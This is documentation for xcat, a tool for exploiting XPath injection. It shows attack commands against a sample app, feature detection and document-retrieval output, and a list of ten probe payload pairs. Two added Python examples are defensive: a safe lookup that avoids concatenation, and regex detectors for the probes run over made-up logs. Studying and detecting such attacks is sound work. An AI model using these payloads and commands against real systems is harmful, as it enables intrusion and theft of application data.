## Common options

All commands except `ip` take the same arguments. These describe the attack you are making, and allow xcat to explore it and work out what features it can use.

At minimum you need to supply:

- A URL to attack (`url`)
- A target parameter which is vulnerable to XPath injection (`target_parameter`)
- A value for this parameter, and optionally others if required (`parameters`)
- A string or a status code that is present in the response if the condition is True (`--true-string` and `--true-code`)
To attack the example vulnerable application you would use:

```
xcat run http://localhost:4567/ query query=Rogue --true-string=Lawyer
```

This instructs xcat that:

- The vulnerable URL is `http://localhost:4567/`
- The vulnerable parameter is `query`
- The parameters to pass to the URL are `query=Rogue`
- The true condition is `Lawyer` being present in the response
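The options above describe the shape of the weakness xcat probes: a request parameter whose value ends up inside an XPath expression, with a true/false condition visible in the response. As an added example that is not code from xcat or from the sample application, the Python below shows that string-building pattern next to a lookup that keeps untrusted input out of the expression entirely. The document shape mirrors the page's `run` output; `unsafe_query` and `safe_titles` are hypothetical names and the catalogue is constructed.

```python
"""Vulnerable XPath string-building beside a lookup that cannot be injected.

Added example, not code from xcat or the sample application it targets.
LIBRARY_XML is constructed to mirror the document shown under `run`.
"""
import xml.etree.ElementTree as ET

LIBRARY_XML = """<root>
  <books>
    <book><title>Rogue Lawyer</title><author>John Grisham</author></book>
    <book><title>Rogue Male</title><author>Geoffrey Household</author></book>
  </books>
</root>"""


def unsafe_query(user_value):
    """The pattern xcat's 'string - single quote' injection targets.

    The user value is pasted between the quotes, so a value containing a
    quote changes the predicate instead of being compared as text.
    """
    return "/root/books/book[title='" + user_value + "']/title"


def safe_titles(xml_text, user_value):
    """Select by structure only and compare the untrusted value in code.

    Nothing the user supplies becomes part of an XPath expression, so quote
    and operator characters are literal text to compare against, and the
    probe pairs xcat sends (`' and '1'='1` / `' and '1'='2`) both simply
    fail to match any title.
    """
    doc = ET.fromstring(xml_text)
    return [
        title.text
        for title in doc.findall("./books/book/title")
        if title.text == user_value
    ]


if __name__ == "__main__":
    probe = "Rogue' and '1'='1"
    print("concatenated expression:", unsafe_query(probe))
    print("safe lookup for probe:  ", safe_titles(LIBRARY_XML, probe))
    print("safe lookup for title:  ", safe_titles(LIBRARY_XML, "Rogue Lawyer"))
```

Where an XPath engine that supports bound variables is available, passing the value as a variable rather than concatenating it gives the same guarantee while keeping the query in XPath.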
### Additional options

#### `--headers`

This argument can be used to send custom headers, including cookies. It should be a file path to a plain text file containing lines in the following format:

```
Header-Name: header-value
```

Example: `xcat run ... --headers=my-header-file.txt`

#### `--body`

This argument is a path to a file containing a request body to send. This is helpful if you are exploiting a POST request that has a vulnerable URL parameter, but also requires a POST body to be sent. The file contents are sent as-is.

Example: `xcat run ... --body=my-request-body.txt`

#### `--encode`

xcat currently supports manipulating either URL or form parameters. This allows you to switch between sending the exploit payload via the POST body or URL arguments.

Example: `xcat run ... --encode=form`

#### `--fast`

When this flag is present xcat will only retrieve the first 15 characters of strings. This can drastically speed up retrieval in documents that contain very large strings.

Example: `xcat run ... --fast`

#### `--concurrency`

This parameter limits the number of concurrent connections xcat can make. Setting it too low will slow down exploitation, but can reduce the load on the target server.

Example: `xcat run ... --concurrency=10`

#### `--enable/--disable`

xcat attempts to intelligently detect what features the target server supports and uses these to speed up retrieval. These flags let you force-enable or force-disable these features.

Example: `xcat run ... --enable=substring-search`

#### `--oob`

Enables the oob server. For more info see the oob server documentation.

Example: `xcat run ... --oob=$EXTERNAL_IP:$EXTERNAL_PORT`
## detect

This command will print out what injection xcat has detected, as well as a list of features and their status. You can use this to quickly explore an injection and different parameter values before commencing an attack.

```
$ xcat detect http://localhost:4567/ query query=Rogue --true-string=Lawyer
function call - last string parameter - single quote
Example: /lib/something[function(?)]
Detected features:
xpath-2: True
xpath-3: False
xpath-3.1: False
normalize-space: True
substring-search: True
codepoint-search: True
environment-variables: False
document-uri: True
base-uri: True
current-datetime: True
unparsed-text: False
doc-function: True
linux: False
expath-file: False
saxon: False
oob-http: False
oob-entity-injection: False
```
## run

This is the core function of xcat. It will retrieve the whole document that is being queried with the vulnerable XPath expression.

```
$ xcat run http://localhost:4567/ query query=Rogue --true-string=Lawyer
<root first="1" second="2" third="">
<!--My lovely library-->
<books>
<book>
<title>
Rogue Lawyer
</title>
<author>
John Grisham
</author>
...
```
## shell

This is one of the most powerful features of xcat. Please see the dedicated shell documentation.
## injections

This command prints out all the injections xcat currently can use, along with the sample expressions xcat will use to test if this injection works.

```
$ xcat injections
Supports 10 injections:
Name: integer
Example: /lib/book[id=?]
Tests:
? and 1=1 = passes
? and 1=2 = fails
Name: string - single quote
Example: /lib/book[name='?']
Tests:
?' and '1'='1 = passes
?' and '1'='2 = fails
Name: string - double quote
Example: /lib/book[name="?"]
Tests:
?" and "1"="1 = passes
?" and "1"="2 = fails
Name: attribute name - prefix
Example: /lib/book[?=value]
Tests:
1=1 and ? = passes
1=2 and ? = fails
Name: attribute name - postfix
Example: /lib/book[?=value]
Tests:
? and not 1=2 and ? = passes
? and 1=2 and ? = fails
Name: element name - prefix
Example: /lib/something?/
Tests:
.[true()]/? = passes
.[false()]/? = fails
Name: element name - postfix
Example: /lib/?something
Tests:
?[true()] = passes
?[false()] = fails
Name: function call - last string parameter - single quote
Example: /lib/something[function(?)]
Tests:
?') and true() and string('1'='1 = passes
?') and false() and string('1'='1 = fails
Name: function call - last string parameter - double quote
Example: /lib/something[function(?)]
Tests:
?") and true() and string("1"="1 = passes
?") and false() and string("1"="1 = fails
Name: other elements - last string parameter - double quote
Example: /lib/something[function(?) and false()] | //*[?]
Tests:
?") and false()] | //*[true() and string("1"="1 = passes
?") and false()] | //*[false() and string("1"="1 = fails
```
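The test expressions in this listing are also the fingerprints a defender can look for: `detect` and `run` send them, as pairs, before any data is retrieved. As an added example that is not part of xcat, the Python below derives one regex per injection family from these probes and runs it over a few constructed access-log lines (the IPs, timestamps and request paths are made up; `find_probes` and `scan_log_lines` are hypothetical names). A form-encoded body, which is what `--encode=form` produces, is not visible in an access log, so the same value check has to run wherever the body is available.

```python
"""Flag request parameters that carry XPath-injection probe patterns.

Added example, not part of xcat. The regexes are derived from the test
expressions in xcat's `injections` listing; the log lines are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# One pattern per injection family in the listing, matched against the
# percent-decoded parameter value (i.e. what the XPath engine would see).
PROBE_PATTERNS = {
    "integer: ? and 1=1 / ? and 1=2": re.compile(r"\band\s+1\s*=\s*[12]\b"),
    "quoted string: ?' and '1'='1": re.compile(
        r"""(['"])\s*and\s*\1\s*1\s*\1\s*=\s*\1\s*[12]"""
    ),
    "attribute name: ? and not 1=2 and ?": re.compile(r"\bnot\s+1\s*=\s*2\b"),
    "element name: ?[true()] / .[false()]/?": re.compile(
        r"\[\s*(?:true|false)\(\)\s*\]"
    ),
    "function call: ?') and true() and string('1'='1": re.compile(
        r"""string\(\s*(['"])\s*1\s*\1\s*=\s*\1\s*[12]"""
    ),
    "other elements: ?\") and false()] | //*[": re.compile(r"\|\s*//\*\["),
}

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed access-log lines: a benign search, the quoted-string probe
# pair, a function-call probe, a benign phrase containing "and", and an
# integer probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?query=Rogue HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?query=Rogue%27+and+%271%27%3D%271 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?query=Rogue%27+and+%271%27%3D%272 HTTP/1.1" 200 120',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /?query=Rogue%27%29+and+true%28%29+and+string%28%271%27%3D%271 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /?query=Lawyer+and+Cats HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /?query=1+and+1%3D1 HTTP/1.1" 200 512',
]


def find_probes(value):
    """Return the names of every probe family matched by one decoded value."""
    return [name for name, pat in PROBE_PATTERNS.items() if pat.search(value)]


def scan_log_lines(lines):
    """Return (line_no, parameter, probe_family) for each suspicious value.

    Only the query string is visible here; a form-encoded body needs the
    same find_probes() check at the point where the body can be read.
    """
    hits = []
    for line_no, line in enumerate(lines, start=1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qs percent-decodes and turns '+' into spaces, so the regexes
        # see the same text the XPath engine would.
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                for family in find_probes(value):
                    hits.append((line_no, param, family))
    return hits


if __name__ == "__main__":
    for line_no, param, family in scan_log_lines(SAMPLE_LOG):
        print(f"line {line_no}: parameter {param!r} matches {family}")
```

The pattern pairs are what make this usable as a detection: a single `and 1=1` in a search box can be a false positive, but the passes/fails pair from the same client within a few seconds, as in lines 2 and 3 of the sample, is the characteristic shape of a boolean oracle being confirmed.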
## ip

This command is a convenience function to get your current external IP address. It takes no arguments.

```
$ xcat ip
123.210.60.90
```